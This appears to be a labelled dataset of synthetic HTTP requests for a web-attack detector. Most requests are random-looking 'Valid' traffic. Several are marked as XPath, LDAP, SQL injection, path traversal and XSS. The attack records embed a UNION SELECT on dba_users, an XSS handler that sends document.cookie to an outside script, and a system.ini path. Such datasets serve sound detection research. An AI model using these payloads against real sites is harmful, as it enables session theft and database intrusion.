Accept-Charset: *
Accept-Encoding: *
Accept-Language: a-0hhe4s, Wnrred-nnhzsys, Deiap-o5hwxf
Cache-Control: max-age=61
Client-ip: 35.238.213.51
Cookie: rpEct=1e winnta
Cookie2: $Version="54"
Date: Fri, 13 Nov 09 23:54:41 CET
ETag: W/"dk2g_5cIXjxM54WhSE"
Expect: 100-continue
From: ateut5@tfeeh.uk
If-Modified-Since: Sun, 21 Jun 09 13:43:38 UTC
If-Unmodified-Since: Wed, 24 Jun 09 15:24:35 CET
If-Match: "xVYCw-vC6JRFC8B"
If-None-Match: "3oF@D7dpAVAWqgn."
If-Range: Fri, 30 Jul 04 22:13:27 GMT
Max-Forwards: 84
MIME-Version: 0.9
Pragma: enLdG=bpe
Proxy-Authorization: Digest response="51d1e171acafe5D1aaf5EF4b7BD78eDA"
Authorization: aPte ce1oao=wldl
Range: 1-,565-51430,79330-
Referer: /etanqxa.dll
TE: trailers
Trailer: Accept
User-Agent: sttu/6.6.5.5
UA-CPU: 68000
UA-Disp: 490,2335,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5756x292
Via: HTTP/4.0 37.164.59.167
Transfer-Encoding: leyyf; eFaefu=eode6eh8
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 240.127.253.85
X-Serial-Number: 396730650206
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8623
Start - Id: 34460
class: Valid
PUT /mleEoouA0eoxiyeg/wnD6CNmL1/hSmr/nIlHmxqbO338/a7eoeiafrrjhR6rh/b8caoBneshAefMe/7pppehiie8aidat9rI/irho.php3? HTTP/1.0
Content-Length: 244
Content-Language: xio,iiuyi
Content-Encoding: gzip
Content-Location: /muiulce4/rut0/m8ni5/2TrcN/oarCaqk.rar
Content-MD5: ZXV0OW8wZnduNWgxYW5lag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Nov 07 04:53:04 CET
Last-Modified: Mon, 15 Oct 07 21:38:04 UTC
Host: 224.161.54.207
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 123.214.67.119
Cookie: tNhc=l3gq3i
Cookie2: $Version="77"
Date: Mon, 29 Aug 05 11:37:10 CET
ETag: W/"MxPCwANK_BBM4ht"
Expect: xHOr13i=ezEi;1nOt4U7r
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Thu, 09 Mar 06 20:33:24 UTC
If-Unmodified-Since: Wed, 29 Sep 04 12:58:21 CET
If-Match: "LLLj_2j3LhnD2b4FC"
If-None-Match: "Q6FN8JhpZpxGOMhAonM"
If-Range: Sat, 30 Oct 04 04:48:28 CET
Max-Forwards: 3013
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Digest qop=auth
Range: 72-2529,-2,002-88966
Referer: http://stra.biz/mole/iftgnm/osayi/Utoi5uex.exe
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 3.3; wC-Ns; rv:5.9.5) Gecko/75186734
UA-CPU: StrongARM
UA-Disp: 7789,084,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: HTTP/4.5 56.32.217.241, 5.2 225.107.44.145
Transfer-Encoding: ie1ec
Upgrade: wgtupi/0.4
Warning: 583 www.eatteot.gif "mglnleiqoRbnha" "Sat, 21 Mar 09 19:35:43 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 481380347065639968
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

rfi=swOee6&3dgL=491&aytoeel5p=7944047&z@ihRhtaccesu=vrlh89yp]+Ecree&Sjt=6451741&osxwf7gI=a5lHlx8yW9&boti=ezgrAEclosoRetTh&hMro=t5.uAAS-t0Wp&doss5Ionoajts=431630&2D8kx=EtGoutpoOsasn&aSc0=2702812&edmtsncgpot3ms=4&Pg-f=1ao delete(htebi=9nF

End - Id: 34460
Start - Id: 49661
class: XPathInjection
GET /m1yL/zbgLgHDv/0kgTftp/atecrles/rscLauret/Elrroecx9N5a1k/nol6tN7aibk4tielrh4/cD.QlJW/uMR_rvuGGwe@C1UZQ9/d3yq7p9G/uBjVH.g8Wq@Ef6oU1GBM/GU.jpeg?qae=n+f%28&pteeihocbla8b=i&iaetrn=991694&79tNs=llCUHTd7Hsyh&dtclEyi=rs7rl&7kzh9XrmX1rU=swRNvurdSp&E4snl=Rk1Sq%2Fieeh%2Fney4fn%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D52%5D+%7C+ht9i0o%2FyA%2Ftirsat%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D680%5D+or++++%27lyno%27++++%3D+++%27&euehmhgvE=20048650&frb=5&faerf2n7gnatd=ayek HTTP/1.1
Host: 33.203.57.213
Connection: HrrjDyh
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, windows-1257
Accept-Encoding: identity;q=0.5
Accept-Language: alisnhhx-ma
Cache-Control: only-if-cached
Client-ip: 159.125.158.213
Cookie: Dyamsgroup byLE=yr5u=oa8tmptn ylnullrrm&;5GaYbfryNnph-hm=tz;eoniiShotIievnD=wnucsmnfevbnlndc;BRKnqbpMGZ2=tYfwF3;amamrmHoHcn3=043;ltaoir=ftWJ2m9
Cookie2: $Version="12"
Date: Wed, 10 Oct 07 23:20:06 CET
ETag: W/"tMSsJ3bLqozrYkMJ"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Sat, 19 Nov 05 03:19:41 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 May 06 13:48:30 GMT
Max-Forwards: 727
MIME-Version: 7.2
Pragma: Swhahesc=R69
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: http://www.coilsa.ch/behanj/6Encd/tbSoou.doc
TE: trailers,gzip
Trailer: Date
User-Agent: tolOaahxqena88
UA-CPU: PowerPC
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 668x5866
Via: 5.4 129.10.237.16
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 113.186.2.179
X-Serial-Number: 38921697
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49661
Start - Id: 14711
class: Valid
GET /rFGP9cN2_/7M-cT/bJZJX_MfZtCYAcv/b2atttey4yuccrt.bin?e@B_59tjF=igs7za&2nd3e=joya&sssiHc6hertsram=85962&tfssj8=sdS7&yseaaEu=aJYuHmGm7q&ekbeeiedder=c6S&MgRsamSatleOmir=tzad3e&frttt=b%7C%5Dtelfuoxo+go HTTP/1.1
Host: www.tscgor.uk
Connection: close
Accept: text/*, image/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 218.227.164.177
Cookie: ewodAdna3vmn=natrezoesys30e0rzt;lroi= p3a;eaece1reR=deysr'zfyconnect4t(mshr;5UyRGaxb8=nxrv;rtEue=Suksrhr3aa
Cookie2: $Version="4"
Date: Thu, 10 Jul 08 01:30:56 GMT
ETag: W/"X0C3HT3EomvL9ueL"
Expect: Rnclms=inlo
From: zar3wadE@0eyihva.cz
If-Modified-Since: Thu, 05 Oct 06 16:01:35 CET
If-Unmodified-Since: Sat, 28 Mar 09 03:03:26 CET
If-Match: *
If-None-Match: "ot5Nz5NTvyzVnl2i"
If-Range: Wed, 29 Dec 04 15:24:59 UTC
Max-Forwards: 297
MIME-Version: 0.3
Pragma: 0nj1=rsiea
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic aXRkbXRyVW86QVRsc3I=
Range: 07-
Referer: http://www.c2tloaet.cz/D9eZH7a/Oesou.dll
TE: gzip;q=0.0,trailers,trailers
Trailer: Accept-Language
User-Agent: 2E7TncM9aiMA
UA-CPU: x86
UA-Disp: 8733,634,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0368x227
Via: etg/1.8 27.146.106.93
Transfer-Encoding: gzip
Upgrade: ien/3.4, cti/1.8, ttyjE/5.2, rea/4.3, hkt/2.0
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14711
Start - Id: 38437
class: LdapInjection
GET /mmhWGn/GSX/diUeieMoareXc/asmtmhpumiaiaspynT/ron/UzwgqK0r@30yAr/uEW2g7.nLE3/fad4nonnhyup6R.jpeg?Bp1PovNJ7xmlyi=%29++%28+++%7C+%28jU8%3Dfu*%29&gunap6l=oos4&hgl=yabheisines&5ci8GYZSconnect=rf7do6idn&0esoipdqpvnT3e=taa0h%27e&znhXdleta=8opaom&Hbtlht=a0Snt_te9 HTTP/1.1
Host: 162.20.143.124
Connection: close
Accept: video/quicktime
Accept-Charset: iso-8859-6;q=0.0, iso-8859-8-i
Accept-Encoding: gzip, compress;q=0.8, deflate, gzip;q=0.1, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 91.250.232.64
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Sat, 04 Jun 05 10:57:01 UTC
ETag: W/"MNBe@AaItOgnq@C3GcyN"
Expect: 100-continue
From: it2uy@ylrV.fr
If-Modified-Since: Sat, 11 Aug 07 02:04:04 UTC
If-Unmodified-Since: Sat, 25 Apr 09 16:01:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: 722-
Referer: http://www.pdi2om.st/imz7.php3
TE: gzip
Trailer: If-Range
User-Agent: ehtheiyh (hJU8d7rR)
UA-CPU: 68000
UA-Disp: 6654,995,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 8.9 15.5.121.42
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 002 214.157.156.89:632 "8yEitwPEhweiynae" "Mon, 24 Nov 08 09:49:08 CET"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38437
Start - Id: 45267
class: PathTransversal
GET /AhhttpsX/l9.F7S8a-J/sjhttps/f3Z_72S2LOHobjectKBl/eRaOnDfwaSBRORYW/nullcmdlink4bgsoundR3mH5f.XD/aheectt0/s916f6o1/Utgiswheola/tcanb.html? HTTP/1.0
Host: 234.28.232.12
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.0
Accept-Language: satoe2wt-etr;q=0.6, 0nrM6a-mrui3ry;q=0.3
Cache-Control: only-if-cached
Cookie: 4M0MpD=ea;grgdcfrntds=5;8DlfeuNOwgtadO=09;rr=nOR_4C74o;5iker7caa=98005
Cookie2: $Version="48"
Date: Fri, 10 Oct 08 12:13:04 GMT
ETag: "_6bFj6M4O-5p6MfZP_"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Match: *
If-None-Match: "IR6jUE6_W-sZ39KPj_Hv"
If-Range: Sun, 11 Jan 04 01:18:30 CET
Authorization: Basic ZWl6WWg6dzJ0cnM=
Referer: /yyinh/elcr/lsineaIi.php
TE: chunked,trailers,trailers
User-Agent: \WINNT\system.ini
UA-CPU: Sparc
Via: 3.7 www.4grnei.jpg, 6.4 231.78.193.3, HTTP/2.4 www.ns7ef.html

null

End - Id: 45267
Start - Id: 6346
class: Valid
PUT /EDtlbpw/d4sbo/a5@ie/nEx8-X6b/tZN6x.asmx? HTTP/1.0
Content-Length: 50
Content-Language: 7,w4zhsss,f1lymC
Content-Encoding: compress
Content-Location: /esoo/kmHnR/i4eg7eoz/yfnfgure.exe
Content-MD5: ZGhvZW1wbWVpeWhnN2FoYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Apr 05 14:49:40 GMT
Last-Modified: Wed, 11 Aug 04 19:08:12 GMT
Host: www.T72e.net
Connection: t6dny
Accept: application/zip;q=0.9, video/mpeg;q=0.0, audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity;q=0.3, compress;q=0.8, deflate, compress
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 176.137.0.206
Cookie: hQeao=8fTsi(o+ean3rl
Cookie2: $Version="073"
Date: Tue, 13 Apr 04 12:26:42 GMT
ETag: W/"Jf.cuX_UWu5ZO8OfC"
Expect: 100-continue
From: 6slThi@serrsRm.gov
If-Modified-Since: Sat, 19 Jun 04 08:10:22 CET
If-Unmodified-Since: Sun, 20 May 07 12:57:06 CET
If-Match: "MZXsrSJ6@3stpgwObV"
If-None-Match: "Df5T-4UFCuUrV_HS1Utu"
If-Range: *
Max-Forwards: 82
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM aHBob3RvbnRtaXRzY2VyZXJuYnRleXJ2blJyYXNtOWh0MWZ0N2Voc210YW9jYUUz
Authorization: Digest algorithm=ioHE
Range: 00-,-67542,3-02025
Referer: /ntldwewr/ocgi9n/ftwe/Scibnh/oneoc.jpeg
TE: chunked,gzip;q=0.3
Trailer: If-None-Match
User-Agent: uTirwotjualnobl1r
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 456x4910
Via: 9.6 www.ahvoeee.gif, 0.0 77.198.120.58, 4.1 www.4snot.jpg
Transfer-Encoding: compress
Upgrade: suom/1.1, roiwo/8.0
Warning: 558 185.158.218.63 "1di3vy7ene9psr" "Sun, 23 Apr 06 02:25:49 GMT"
X-Forwarded-For: 253.132.79.208
X-Serial-Number: 9387717978
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

6iBrf4=0194584&r1rn5Iiyavli9=ebpl&u7deMGPVy=222564

End - Id: 6346
Start - Id: 49652
class: XPathInjection
GET /hcesRnRmecE8dallsn/tot/yxCG134Bf2LkweH/eG.layX-.htm?2eNsnHwakbooo=784312&yueoammeina=nrf.6&9ujDdohrcta=i%28e0e%7Epq&rqtuattemH=emoHrcp&yoyheiwOtmtc=Io%27%5D+++++%7C+++++P+++%7C++++%2F%2Fuser%5B++name%2Ftext%28+%29+%3D%27sf8&i3ea=tyvX1kOMLf&OeThes=xpPzkrW&8qoxXrm6p@=ncE&1QR3oKX=Et%2Bgd5&ua=t7&cfncw7lfn=em01&yxsbelrder=duRnLnsh&tO4EzE=fgTqySUA HTTP/1.1
Host: www.et8oazsdaZ.cz
Connection: keep-alive
Accept: video/*, audio/*, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: i-yHto
Cache-Control: max-stale
Client-ip: 135.193.196.43
Cookie: einwa1ofmLl=0;caecahonhe5=4mpsz;ueegtk1oFeastt=y1th4lS1;7s=eq0ie
Cookie2: $Version="00"
Date: Wed, 19 Nov 08 11:48:36 CET
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Tue, 02 Sep 08 15:32:59 GMT
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "VD0GHtMTXYtqDPIn0"
If-None-Match: "xACEu36hh0VLWRshe"
If-Range: Sat, 11 Mar 06 22:01:13 CET
Max-Forwards: 5921
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mna4agle.it/ahffsu/so9n/rtiEyi0e/miafb/toahlqn.pdf
Range: -377,00-3
Referer: /udton.aspx
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: 1rs1uehaW (f4geW7zq3R; fQzMurcj5j; l-3GrrZj1; eo.k1rNU)
UA-CPU: PowerPC
UA-OS: Windows NT
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49652
Start - Id: 42709
class: SqlInjection
POST /autoexec7Er7@G9Rwindow.open/nufienthaa1neonTdT/u5se6w/ahm0@_4mY2.QPx/eR@W_u1Kd8PXCBBu/d8daearetfeabondDheo/eoJ3Fyb9Ws5FKFbPHei0/sKta./iWul8vrli/xTQRM9pZkJkvGsIdJ2e/e1O@yyMJjT.tFD_taa.asp? HTTP/1.0
Content-Length: 241
Content-Language: se
Content-Encoding: deflate
Content-Location: /hdeteuIt/oEneh/dy7w/mkassoL/tddb.jpeg
Content-MD5: ZWludG91c2VodXpleVVhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 12 Jan 08 08:18:13 GMT
Host: 218.175.156.103
Connection: tetssah
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: esNe'  UNION     /**/ SELECT  iinTu6 FROM     dba_users    WHERE    gl     like '%25
Accept-Language: *
Cache-Control: no-store
Client-ip: 228.125.37.130
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="69"
Date: Mon, 18 Dec 06 15:58:53 CET
ETag: W/"O9kcnRqr.hXbx6V_il8"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Mon, 21 May 07 18:31:47 CET
If-Unmodified-Since: Tue, 08 Jan 08 15:52:13 GMT
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Mon, 03 Dec 07 07:24:50 CET
Max-Forwards: 20
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic cjVuZDp4Z0ZlaHZoZg==
Authorization: Digest username="lgR2ato"
Range: 30889-130,957-,45-484050
Referer: /rrom/EeaYhm7/its4ui/a3gje.mp3
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 3.5; 7a-io; rv:8.9.2) Gecko/74055808
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: 2.6 www.rDnBdoe.jpg, osHTyt/0.6 www.snjtOtQ.jpg
Transfer-Encoding: 5retfe; iyicdta=mahetiw
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 987 208.120.245.13 "dsnf" 
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

hetnc=8373&9ZDm0SQIx68=euwEu&lcmeethm=ejn3&xsl4Lfe=tla\z&ol4greu2tgntw=284&9TNPgcw=tEEf&7c=igLsS&bXetcFQ2ZJbo=tlJLefNMeJ&anNymrriezcrcda=beintbe9zinpute&3depf0DUcCrscS=eessnq@hio&diutuNi=ieqe mhT19&f6edeifq=5731848&Lutat=ed&TA@like=5dnoa

End - Id: 42709
Start - Id: 5078
class: Valid
PUT /asjoqAEstnir2m/9R8Etr/aBK.F_jDSA/3q.FCPG1s4@M8M/gwHPs_E_6BnZT6uj9vw/tXKr-aCSrcIduvYXiV/h_iHTzeWY/sus6des/6.cDxpassthruUe/HeKuW@/HAHDgr2rmwC/eheieon7ee4trs.htm? HTTP/1.0
Content-Length: 59
Content-Language: 8z
Content-Encoding: gzip
Content-Location: http://lerr.it/ttAnasho.tar
Content-MD5: aTZjbGltcmVFcjlVbnN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Jul 08 12:58:25 UTC
Last-Modified: Thu, 28 Apr 05 05:58:08 UTC
Host: www.7e6sascoi.st
Connection: 8jqt
Accept: text/*
Accept-Charset: us-ascii;q=0.1, cp-950, iso-8859-6;q=0.6, x-mac-hebrew;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: so5I-prauet;q=0.2, wr4tmtcl-aeysai;q=0.9, h3sgce-hylurgf, iqiept-toilwtgi;q=0.2, o3na89-obcm
Cache-Control: max-age=5165
Client-ip: 193.76.254.81
Cookie: sytatibdetEht=d6pfry4inastNr;E8weroeu=iignftoERsuo6w;bnrneeAee7opTo=shvarfcopyD~e0 0;e0iot=139;tl=3846962;wfdogrtcnndaexT=blour  dakbee
Cookie2: $Version="09"
Date: Tue, 02 Oct 07 02:29:30 UTC
ETag: W/"w1nRMngetPnoVO-EXg"
Expect: 100-continue
From: rbDpahs@ipSonalu.biz
If-Modified-Since: Fri, 16 Jan 09 12:19:36 CET
If-Unmodified-Since: Tue, 30 Nov 04 17:05:55 UTC
If-Match: *
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 613
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic b3VheW86d2Z6c2Rl
Range: 4666-,507125-81685,186998-
Referer: http://www.i91aa.biz/AusCqh/iehcne/ai4Eto5/jwn84.pdf
TE: trailers,deflate;q=0.0,chunked
Trailer: Host
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 6.3; Te-en; rv:4.5.0) Gecko/43356966
UA-CPU: StrongARM
UA-Disp: 925,165,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9463x8192
Via: rrmelO/5.5 176.137.76.89:45077
Transfer-Encoding: gzip
Upgrade: fnget0/9.0, Hrn/8.2
Warning: 924 www.0aalst.html "scbouiehneadt8mn" "Wed, 22 Jun 05 19:29:52 CET"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

evalQoEAysvselectVhI=315125&nwmebi=siqnanaLa&noEtRrcp8ee=46

End - Id: 5078
Start - Id: 47719
class: XSS
GET /u@QX/swStEFY3O@oiLr6-@_45/r9WRvUDOjwZQhtIOfJ/bsrwro/spOsefatrtbgc.gif?bs=dtnceeaipnuai&e1yi52dctese=677206165&uwaIwu3=1806714&tseyissdEnnA=%3Cdiv+onmouseover++++%3D++%22++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.el.com%2Fcgi-bin%2Fsticge.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&c7OTiw6seEiiwew=so&shlheao=dVsbM%405o&eF54ekpnsieew=%2Be%3B%5C&ao0cbeSehe1iHe=1&sllcF6=1GNwbS&alsEpaehsarhosr=3065401&nrmir=ttivelogwTukr9tthaving&wT_@=7010756&rcldg0biLeon=rn7paf HTTP/1.1
Host: 207.72.23.60
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-8, shift_jis, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=7180
Client-ip: 159.246.73.87
Cookie: omc8T=pihg;tgeern=httpeA;s5luar=w;hqurT0pgn=t2El;dhqH=nse
Cookie2: $Version="6"
Date: Sat, 04 Jul 09 19:37:21 GMT
ETag: W/".Yvf.hV0JUrMVXmG"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Wed, 16 Mar 05 20:51:28 CET
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "1o83EFYH4c9k9cMbn7"
If-None-Match: "ICfXt0tcyh3@APsya"
If-Range: Thu, 18 Aug 05 18:57:21 CET
Max-Forwards: 770
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: npea4 teibaJi=27tnwTro
Range: 2174-,56-,-57382
Referer: http://www.anld.de/dibjTb/nasdsces/IaXulel/5dnwtr/oVypSe.mdb
TE: chunked;q=0.4
Trailer: Date
User-Agent: Mozilla/4.5 (X11; U; Linux i386 2.9; Ds-no; rv:2.7.7) Gecko/15445104
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47719
Start - Id: 29231
class: Valid
GET /eXjPNoOR/IDH/lqh-o.hX2zw/n./OjbRsocegark.msf?4eArcn=uixHj4&dnLto7th=96 HTTP/1.1
Host: 132.4.177.148:80
Connection: edoni
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.6, gzip, compress;q=0.6, identity
Accept-Language: dhh-0cx;q=0.7, uoa5-ehogL, le-etThj;q=0.8
Cache-Control: max-stale=35037
Client-ip: 184.212.88.165
Cookie: ehtudDtl=select nA;anutPbh=rnpstiiO;td=qPmDs72Ph;ytor=3OAEvYH
Cookie2: $Version="37"
Date: Thu, 18 Mar 04 24:19:06 GMT
ETag: W/"0g6jIwNgmq@Y4ApsNc"
Expect: 100-continue
From: pfeb@exzls2nagt.biz
If-Modified-Since: Thu, 17 Dec 09 16:43:16 UTC
If-Unmodified-Since: Wed, 27 Feb 08 12:46:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 506
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: Basic bmR0dGFtdE86dG9vZW9vbmM=
Range: -2
Referer: http://www.iuarl.st/trrtHont.swf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.8 (compatible; MSIE 0.0; Open BSD i586; slbjmxsyc0; twgerrnot)
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 200x896
Via: ttw/5.9 www.ewcMXa.shtml, 8.7 46.83.44.78
Transfer-Encoding: gzip
Upgrade: 5ds/8.0, gms/2.1, sEn/5.6, eashzN/1.6
Warning: 361 218.11.136.34 "5tnre7tafvhoea" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29231
Start - Id: 10982
class: Valid
GET /ctrrhn9tthteno8/osK7ZkILZJIXieBQR_a/a4SHdaeV9N8xb8J/ueehoiwaRQlcolauee7z/40sk/ssdrsexq6GLoczlodis.cfm? HTTP/1.1
Host: www.lwexgef8ep.biz
Connection: eghaTnKG
Accept: application/*
Accept-Charset: windows-1251;q=0.8, windows-1255;q=0.8, cp-932;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=8727
Client-ip: 69.240.210.27
Cookie: 9ngnIoSjnneRrp=0;eutmbseo4patR4y=632992;o6bn5eLnoIs=nmdcwyaeN&httpa;5rnred=toEHslba2eoqelo7le;ntnohhdmteL=Wlocationrunionu3nl;ylvtf5=cedxEt&zzh
Cookie2: $Version="75"
Date: Fri, 18 Apr 08 07:20:52 UTC
ETag: "l3Um3FuC_D3@Yj0mc"
Expect: tx0nAsr=eNpiep
From: e5rsien@oece.be
If-Modified-Since: Wed, 01 Sep 04 01:35:49 GMT
If-Unmodified-Since: Sat, 20 Mar 10 14:31:19 UTC
If-Match: *
If-None-Match: "a6K5TQnRUlDp5dTezlgU"
If-Range: Mon, 05 Sep 05 24:24:48 GMT
Max-Forwards: 0288
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM Z2F6Y2dudGFpcm9Nc3lpb3lkZWFUYnBuaWUzb2lkbnNzb2V2YWFsYQ==
Range: 415535-51
Referer: /gfe9/gyfa7she/mzkb/Dtodf.mspx
TE: trailers
Trailer: From
User-Agent: a4qqrod
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 124x705
Via: 2.1 34.175.162.81
Transfer-Encoding: 8ntR4
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 502 www.a6ETf3aa.jpeg "ihitc" "Mon, 05 Nov 07 14:03:56 UTC"
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10982
Start - Id: 23410
class: Valid
GET /HSgnetcat9/xv/a1daeOrtm6donen/14q3sE48jF/oYHhcns@z7TLn/miEwsHR2mGshh5gH/beECjls2eu/sorJW6rc/oLsxdead/ymijlehrd9xttnhjto.aspx?ea4heofwirisnoi=%28copyeo8&sei5yhthk0=05&rdwncanaeMigd=samniqlht%26%29at HTTP/1.1
Host: www.eaefarepuh.gov
Connection: keep-alive
Accept: */*;q=0.0
